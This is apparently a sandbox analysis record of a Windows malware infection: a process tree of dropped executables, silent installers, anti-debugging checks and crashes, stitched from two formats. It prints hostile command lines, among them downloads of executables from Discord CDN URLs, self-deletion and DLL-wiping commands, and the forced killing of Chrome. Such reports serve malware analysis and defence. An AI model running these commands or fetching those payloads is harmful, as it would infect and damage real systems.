      [4] C:\Users\Admin\Pictures\Adobe Films\pxFVo1W5MFI0ckCFnxGXLW81.exe
          PID 3144
        [5] C:\Users\Admin\AppData\Local\Temp\is-3AKCF.tmp\pxFVo1W5MFI0ckCFnxGXLW81.tmp
            cmd: "C:\Users\Admin\AppData\Local\Temp\is-3AKCF.tmp\pxFVo1W5MFI0ckCFnxGXLW81.tmp" /SL5="$10226,506127,422400,C:\Users\Admin\Pictures\Adobe Films\pxFVo1W5MFI0ckCFnxGXLW81.exe"
            PID 2076
          [6] C:\Users\Admin\AppData\Local\Temp\is-3G0SN.tmp\lakazet.exe
              cmd: "C:\Users\Admin\AppData\Local\Temp\is-3G0SN.tmp\lakazet.exe" /S /UID=2709
              PID 664
            [7] C:\Users\Admin\AppData\Local\Temp\61-e5d3d-47c-4b38d-542a7db20f7e2\Wymyrymaena.exe
                PID 1720
            [7] C:\Users\Admin\AppData\Local\Temp\3e-4c772-d04-bc289-79342927dd8df\Qequhaqoga.exe
                PID 5188
              [8] C:\Windows\System32\cmd.exe
                  cmd: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\loqacgg2.mlj\Install1.exe & exit
                  PID 2968
                [9] C:\Users\Admin\AppData\Local\Temp\loqacgg2.mlj\Install1.exe
                    PID 4404
                  [10] C:\Users\Admin\AppData\Local\Temp\Install1.exe
                      PID 6568
              [8] C:\Windows\System32\cmd.exe
                  cmd: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ychnk0ph.pzt\vinmall_da.exe /silent & exit
                  PID 3724
                [9] C:\Users\Admin\AppData\Local\Temp\ychnk0ph.pzt\vinmall_da.exe
                    cmd: C:\Users\Admin\AppData\Local\Temp\ychnk0ph.pzt\vinmall_da.exe /silent
                    PID 6536
              [8] C:\Windows\System32\cmd.exe
                  cmd: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h0bg120b.xbj\GcleanerEU.exe /eufive & exit
                  PID 6224
                [9] C:\Users\Admin\AppData\Local\Temp\h0bg120b.xbj\GcleanerEU.exe
                    cmd: C:\Users\Admin\AppData\Local\Temp\h0bg120b.xbj\GcleanerEU.exe /eufive
                    PID 6640
                  [10] C:\Users\Admin\AppData\Local\Temp\h0bg120b.xbj\GcleanerEU.exe
                      cmd: C:\Users\Admin\AppData\Local\Temp\h0bg120b.xbj\GcleanerEU.exe /eufive
                      PID 6692
              [8] C:\Windows\System32\cmd.exe
                  cmd: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wvdimhar.uti\vpn.exe /silent /subid=798 & exit
                  PID 6616
                [9] C:\Users\Admin\AppData\Local\Temp\wvdimhar.uti\vpn.exe
                    cmd: C:\Users\Admin\AppData\Local\Temp\wvdimhar.uti\vpn.exe /silent /subid=798
                    PID 7052
                  [10] C:\Users\Admin\AppData\Local\Temp\is-TUHM8.tmp\vpn.tmp
                      cmd: "C:\Users\Admin\AppData\Local\Temp\is-TUHM8.tmp\vpn.tmp" /SL5="$10416,15170975,270336,C:\Users\Admin\AppData\Local\Temp\wvdimhar.uti\vpn.exe" /silent /subid=798
                      PID 7164
                    [11] C:\Windows\SysWOW64\cmd.exe
                        cmd: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                        PID 5868
                      [12] C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                          cmd: tapinstall.exe remove tap0901
                          PID 5768
                    [11] C:\Windows\SysWOW64\cmd.exe
                        cmd: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                        PID 6784
                      [12] C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                          cmd: tapinstall.exe install OemVista.inf tap0901
                          PID 4784
              [8] C:\Windows\System32\cmd.exe
                  cmd: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\14es1gqk.zxw\installer.exe /qn CAMPAIGN="654" & exit
                  PID 6800
                [9] C:\Users\Admin\AppData\Local\Temp\14es1gqk.zxw\installer.exe
                    cmd: C:\Users\Admin\AppData\Local\Temp\14es1gqk.zxw\installer.exe /qn CAMPAIGN="654"
                    PID 7044
                  [10] C:\Windows\SysWOW64\msiexec.exe
                      cmd: "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\14es1gqk.zxw\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\14es1gqk.zxw\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634168960 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                      PID 6232
              [8] C:\Windows\System32\cmd.exe
                  cmd: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oznsddlb.mp5\any.exe & exit
                  PID 6988
                [9] C:\Users\Admin\AppData\Local\Temp\oznsddlb.mp5\any.exe
                    PID 6496
                  [10] C:\Users\Admin\AppData\Local\Temp\oznsddlb.mp5\any.exe
                      cmd: "C:\Users\Admin\AppData\Local\Temp\oznsddlb.mp5\any.exe" -u
                      PID 6760
              [8] C:\Windows\System32\cmd.exe
                  cmd: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3i4gul1l.tmo\rtst1045.exe & exit
                  PID 1832
                [9] C:\Users\Admin\AppData\Local\Temp\3i4gul1l.tmo\rtst1045.exe
                    PID 5716
              [8] C:\Windows\System32\cmd.exe
                  cmd: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pvtp3dvk.vnp\gcleaner.exe /mixfive & exit
                  PID 5160
                [9] C:\Users\Admin\AppData\Local\Temp\pvtp3dvk.vnp\gcleaner.exe
                    cmd: C:\Users\Admin\AppData\Local\Temp\pvtp3dvk.vnp\gcleaner.exe /mixfive
                    PID 4136
                  [10] C:\Users\Admin\AppData\Local\Temp\pvtp3dvk.vnp\gcleaner.exe
                      cmd: C:\Users\Admin\AppData\Local\Temp\pvtp3dvk.vnp\gcleaner.exe /mixfive
                      PID 6080
              [8] C:\Windows\System32\cmd.exe
                  cmd: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\inkzwexo.yrc\autosubplayer.exe /S & exit
                  PID 4980
              [8] C:\Windows\System32\cmd.exe
                  cmd: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zr3aadyp.bzf\installer.exe /qn CAMPAIGN=654 & exit
                  PID 2292
                [9] C:\Users\Admin\AppData\Local\Temp\zr3aadyp.bzf\installer.exe
                    cmd: C:\Users\Admin\AppData\Local\Temp\zr3aadyp.bzf\installer.exe /qn CAMPAIGN=654
                    PID 6784
            [7] C:\Program Files\Windows Defender Advanced Threat Protection\XFGQCCTTOK\foldershare.exe
                cmd: "C:\Program Files\Windows Defender Advanced Threat Protection\XFGQCCTTOK\foldershare.exe" /VERYSILENT
                PID 5396
      [4] C:\Users\Admin\Pictures\Adobe Films\rUQzU8dGdOkZUN9QdHOtgEPw.exe
          PID 4900
        [5] C:\Users\Admin\Pictures\Adobe Films\rUQzU8dGdOkZUN9QdHOtgEPw.exe
            cmd: "C:\Users\Admin\Pictures\Adobe Films\rUQzU8dGdOkZUN9QdHOtgEPw.exe" -u
            PID 3640
      [4] C:\Users\Admin\Pictures\Adobe Films\a5fd8PV6jg7cJ2ynvQgXPvjV.exe
          PID 3424
          - Executes dropped EXE
  [2] C:\Users\Admin\Pictures\Adobe Films\ZmGwCijz_aF6kekXlZOAQ8Bm.exe
      PID 1572
      - Executes dropped EXE
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: "C:\Windows\System32\cmd.exe" /c taskkill /im ZmGwCijz_aF6kekXlZOAQ8Bm.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\ZmGwCijz_aF6kekXlZOAQ8Bm.exe" & del C:\ProgramData\*.dll & exit
        PID 344
      [4] C:\Windows\SysWOW64\taskkill.exe
          cmd: taskkill /im ZmGwCijz_aF6kekXlZOAQ8Bm.exe /f
          PID 932
          - Kills process with taskkill
      [4] C:\Windows\SysWOW64\timeout.exe
          cmd: timeout /t 6
          PID 1048
          - Delays execution with timeout.exe
  [2] C:\Users\Admin\Pictures\Adobe Films\IPkZZkIpJIP4h4aZO88aFQU8.exe
      PID 2256
      - Executes dropped EXE
    [3] C:\Windows\system32\cmd.exe
        cmd: "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9249.tmp\925A.tmp\925B.bat "C:\Users\Admin\Pictures\Adobe Films\IPkZZkIpJIP4h4aZO88aFQU8.exe""
        PID 3112
      [4] C:\Users\Admin\AppData\Local\Temp\9249.tmp\925A.tmp\extd.exe
          cmd: C:\Users\Admin\AppData\Local\Temp\9249.tmp\925A.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
          PID 4508
      [4] C:\Users\Admin\AppData\Local\Temp\9249.tmp\925A.tmp\extd.exe
          cmd: C:\Users\Admin\AppData\Local\Temp\9249.tmp\925A.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/910827251535314946/910828711157309470/18.exe" "18.exe" "" "" "" "" "" ""
          PID 1496
      [4] C:\Users\Admin\AppData\Local\Temp\9249.tmp\925A.tmp\extd.exe
          cmd: C:\Users\Admin\AppData\Local\Temp\9249.tmp\925A.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/910827251535314946/910828757600858142/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""
          PID 3880
      [4] C:\Users\Admin\AppData\Local\Temp\5300\18.exe
          cmd: 18.exe
          PID 4264
      [4] C:\Users\Admin\AppData\Local\Temp\5300\Transmissibility.exe
          cmd: Transmissibility.exe
          PID 2204
      [4] C:\Users\Admin\AppData\Local\Temp\9249.tmp\925A.tmp\extd.exe
          cmd: C:\Users\Admin\AppData\Local\Temp\9249.tmp\925A.tmp\extd.exe "" "" "" "" "" "" "" "" ""
          PID 3880
  [2] C:\Users\Admin\Pictures\Adobe Films\D2iekO3L2Z2yXRah6Fyyo_Tq.exe
      PID 2236
      - Executes dropped EXE
    [3] C:\Users\Admin\Pictures\Adobe Films\D2iekO3L2Z2yXRah6Fyyo_Tq.exe
        PID 4596
  [2] C:\Users\Admin\Pictures\Adobe Films\aWO3kyDWUY6qOk8aw7dUT6ep.exe
      PID 3880
      - Executes dropped EXE
  [2] C:\Users\Admin\Pictures\Adobe Films\PB2I64qARSFDtYJ3nobcBQFo.exe
      PID 804
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: cmd.exe /c taskkill /f /im chrome.exe
        PID 3844
      [4] C:\Windows\SysWOW64\taskkill.exe
          cmd: taskkill /f /im chrome.exe
          PID 4976
          - Kills process with taskkill
  [2] C:\Users\Admin\Pictures\Adobe Films\QV0IFeEZkl3FCtLgF98mEOh9.exe
      PID 60
      - Executes dropped EXE
      - Checks BIOS information in registry
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
  [2] C:\Users\Admin\Pictures\Adobe Films\3fzJvJsNxh3XgOwzydSsFjvG.exe
      PID 1868
      - Executes dropped EXE
      - Checks BIOS information in registry
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
  [2] C:\Users\Admin\Pictures\Adobe Films\jjJwr9ifpZzN9Q81BgUEgmtM.exe
      PID 1280
      - Executes dropped EXE
    [3] C:\Windows\SysWOW64\WerFault.exe
        cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 1280 -s 400
        PID 3404
        - Program crash
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Users\Admin\Pictures\Adobe Films\Di68BgTKfVJrtOniWjpuFeoP.exe
      PID 2284
      - Executes dropped EXE
      - Checks BIOS information in registry
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
  [2] C:\Users\Admin\Pictures\Adobe Films\gf4yL6i5_1EnGcL45rapBi4N.exe
      PID 348
      - Executes dropped EXE
  [2] C:\Users\Admin\Pictures\Adobe Films\tk0pJOIVedvbbDoftQOGUQGr.exe
      PID 1752
      - Executes dropped EXE
      - Checks BIOS information in registry
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
  [2] C:\Users\Admin\Pictures\Adobe Films\2FwGPMS0DwsAJmJt30kqxVWa.exe
      PID 1216
      - Executes dropped EXE
      - Checks BIOS information in registry
      - Checks whether UAC is enabled
    [3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        PID 1724
    [3] C:\Windows\SysWOW64\WerFault.exe
        cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 548
        PID 4184
        - Program crash
  [2] C:\Users\Admin\Pictures\Adobe Films\TCmEOe83n5q_zlXj1ichAwHp.exe
      PID 3196
      - Executes dropped EXE
      - Checks BIOS information in registry
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
  [2] C:\Users\Admin\Pictures\Adobe Films\ZOfaCe2gP2ntE8UsdnOMtkcn.exe
      PID 2600
      - Executes dropped EXE
  [2] C:\Users\Admin\Pictures\Adobe Films\7IMHR70sE01sKpdv3ItQAxCA.exe
      PID 360
    [3] C:\Users\Admin\Pictures\Adobe Films\7IMHR70sE01sKpdv3ItQAxCA.exe
        PID 1260
        - Executes dropped EXE
  [2] C:\Users\Admin\Pictures\Adobe Films\n7IoPyl0GofJiCvMJ26_RxWk.exe
      PID 2352
      - Executes dropped EXE
      - Checks BIOS information in registry
      - Checks whether UAC is enabled
    [3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        PID 312
    [3] C:\Windows\SysWOW64\WerFault.exe
        cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 560
        PID 4208
        - Program crash
  [2] C:\Users\Admin\Pictures\Adobe Films\L9S67PdEwQEN8zxKqmVrVq_C.exe
      PID 600
      - Executes dropped EXE
  [2] C:\Users\Admin\Pictures\Adobe Films\GnYY58_zNkV7iYJyGcEVYFxH.exe
      PID 596
      - Executes dropped EXE
      - Drops file in Program Files directory
    [3] C:\Program Files (x86)\Company\NewProduct\inst2.exe
        PID 3424
    [3] C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
        PID 900
        - Executes dropped EXE
    [3] C:\Program Files (x86)\Company\NewProduct\rtst1039.exe
        PID 2216
        - Executes dropped EXE
  [2] C:\Users\Admin\Pictures\Adobe Films\uw3x5UZ_x4Ps_eaCOFD55IW_.exe
      PID 1072
      - Executes dropped EXE
  [2] C:\Users\Admin\Pictures\Adobe Films\JkEAwDR9eFf1IiksFz8QTw_O.exe
      PID 1060
      - Executes dropped EXE
  [2] C:\Users\Admin\Pictures\Adobe Films\e1CrrXCkZ8t_nyzdNUuoLNt_.exe
      PID 1488
      - Executes dropped EXE
    [3] C:\Windows\SysWOW64\WerFault.exe
        cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 660
        (the process listing is cut off here)
- Program crash
PID:1256
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 7123⤵
- Program crash
PID:4376
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 6683⤵
- Program crash
PID:4664
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 6643⤵
- Program crash
PID:4908
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 11643⤵
- Program crash
PID:3440
-
-
-
C:\Users\Admin\Pictures\Adobe Films\8u0oitmhgevh1MzSaqj9ppEe.exe"C:\Users\Admin\Pictures\Adobe Films\8u0oitmhgevh1MzSaqj9ppEe.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:1364
-
-
C:\Users\Admin\Pictures\Adobe Films\IHQCcHHYLfinJ7eO1FtmjmkC.exe"C:\Users\Admin\Pictures\Adobe Films\IHQCcHHYLfinJ7eO1FtmjmkC.exe"2⤵PID:4480
-
C:\Users\Admin\AppData\Local\Temp\is-U6KA1.tmp\IHQCcHHYLfinJ7eO1FtmjmkC.tmp"C:\Users\Admin\AppData\Local\Temp\is-U6KA1.tmp\IHQCcHHYLfinJ7eO1FtmjmkC.tmp" /SL5="$80054,506127,422400,C:\Users\Admin\Pictures\Adobe Films\IHQCcHHYLfinJ7eO1FtmjmkC.exe"3⤵PID:4336
-
C:\Users\Admin\AppData\Local\Temp\is-8JU4R.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-8JU4R.tmp\lakazet.exe" /S /UID=27094⤵PID:4816
-
C:\Users\Admin\AppData\Local\Temp\ce-83069-2f1-a0cab-ddf046497ebdc\Laejataniko.exe"C:\Users\Admin\AppData\Local\Temp\ce-83069-2f1-a0cab-ddf046497ebdc\Laejataniko.exe"5⤵PID:856
-
-
C:\Users\Admin\AppData\Local\Temp\4f-23380-0f2-2b189-aaa2378e92525\Qequhaqoga.exe"C:\Users\Admin\AppData\Local\Temp\4f-23380-0f2-2b189-aaa2378e92525\Qequhaqoga.exe"5⤵PID:2944
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xcsgjjvt.xgw\vinmall_da.exe /silent & exit6⤵PID:6184
-
C:\Users\Admin\AppData\Local\Temp\xcsgjjvt.xgw\vinmall_da.exeC:\Users\Admin\AppData\Local\Temp\xcsgjjvt.xgw\vinmall_da.exe /silent7⤵PID:6720
-
-
-
-
C:\Program Files\Windows NT\QMFAFXAOFB\foldershare.exe"C:\Program Files\Windows NT\QMFAFXAOFB\foldershare.exe" /VERYSILENT5⤵PID:5236
-
-
-
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:360
-
C:\Users\Admin\AppData\Local\Temp\5FAB.exeC:\Users\Admin\AppData\Local\Temp\5FAB.exe1⤵PID:3148
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵PID:5220
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4336 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:4480
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:5044
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5988
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7132
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6972
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:7144
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 60B5E07FC3908615AC0A48170D3DBFD6 C2⤵PID:5744
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0F27FA0CADE3BEDA3D89B13783D58CB62⤵PID:6484
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:5860
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6832
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7020 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:1352
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:6456
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{3544a670-8092-464f-8b44-182de9d5cc5e}\oemvista.inf" "9" "4d14a44ff" "000000000000016C" "WinSta0\Default" "0000000000000168" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:4072
-